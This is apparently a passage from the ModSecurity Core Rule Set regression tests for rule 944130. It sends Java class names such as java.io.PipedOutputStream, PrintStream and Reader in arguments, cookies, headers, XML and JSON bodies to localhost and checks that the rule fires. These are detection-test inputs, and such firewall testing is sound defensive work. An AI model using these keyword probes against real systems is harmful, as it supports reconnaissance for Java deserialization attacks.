Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.PipedOutputStream=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-200 - desc: "Cookie test includes keyword java.io.PipedOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PipedOutputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-201 - desc: "Cookie name includes keyword java.io.PipedOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PipedOutputStream=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-202 - desc: "Request header test includes keyword java.io.PipedOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.PipedOutputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-203 - desc: "XML attribute value includes keyword java.io.PipedOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-204 - desc: "XML element value includes keyword java.io.PipedOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-205 - desc: "Nested XML element value includes keyword java.io.PipedOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-206 - desc: "Content-Type text/plain includes keyword java.io.PipedOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-207 - desc: "Content-Type application/json arg value includes keyword java.io.PipedOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PipedOutputStream\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-208 - desc: "Content-Type application/json arg name includes keyword java.io.PipedOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.PipedOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-209 - desc: "Argument test includes keyword java.io.PipedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-210 - desc: "Argument name includes keyword java.io.PipedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.PipedReader=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-211 - desc: "Cookie test includes keyword java.io.PipedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PipedReader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-212 - desc: "Cookie name includes keyword java.io.PipedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PipedReader=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-213 - desc: "Request header test includes keyword java.io.PipedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.PipedReader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-214 - desc: "XML attribute value includes keyword java.io.PipedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-215 - desc: "XML element value includes keyword java.io.PipedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-216 - desc: "Nested XML element value includes keyword java.io.PipedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-217 - desc: "Content-Type text/plain includes keyword java.io.PipedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-218 - desc: "Content-Type application/json arg value includes keyword java.io.PipedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PipedReader\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-219 - desc: "Content-Type application/json arg name includes keyword java.io.PipedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.PipedReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-220 - desc: "Argument test includes keyword java.io.PrintStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-221 - desc: "Argument name includes keyword java.io.PrintStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.PrintStream=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-222 - desc: "Cookie test includes keyword java.io.PrintStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PrintStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-223 - desc: "Cookie name includes keyword java.io.PrintStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PrintStream=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-224 - desc: "Request header test includes keyword java.io.PrintStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.PrintStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-225 - desc: "XML attribute value includes keyword java.io.PrintStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-226 - desc: "XML element value includes keyword java.io.PrintStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-227 - desc: "Nested XML element value includes keyword java.io.PrintStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-228 - desc: "Content-Type text/plain includes keyword java.io.PrintStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-229 - desc: "Content-Type application/json arg value includes keyword java.io.PrintStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PrintStream\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-230 - desc: "Content-Type application/json arg name includes keyword java.io.PrintStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.PrintStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-231 - desc: "Argument test includes keyword java.io.PushbackInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-232 - desc: "Argument name includes keyword java.io.PushbackInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.PushbackInputStream=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-233 - desc: "Cookie test includes keyword java.io.PushbackInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PushbackInputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-234 - desc: "Cookie name includes keyword java.io.PushbackInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PushbackInputStream=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-235 - desc: "Request header test includes keyword java.io.PushbackInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.PushbackInputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-236 - desc: "XML attribute value includes keyword java.io.PushbackInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-237 - desc: "XML element value includes keyword java.io.PushbackInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-238 - desc: "Nested XML element value includes keyword java.io.PushbackInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-239 - desc: "Content-Type text/plain includes keyword java.io.PushbackInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-240 - desc: "Content-Type application/json arg value includes keyword java.io.PushbackInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PushbackInputStream\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-241 - desc: "Content-Type application/json arg name includes keyword java.io.PushbackInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.PushbackInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-242 - desc: "Argument test includes keyword java.io.Reader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.Reader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-243 - desc: "Argument name includes keyword java.io.Reader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.Reader=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-244 - desc: "Cookie test includes keyword java.io.Reader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.Reader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-245 - desc: "Cookie name includes keyword java.io.Reader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 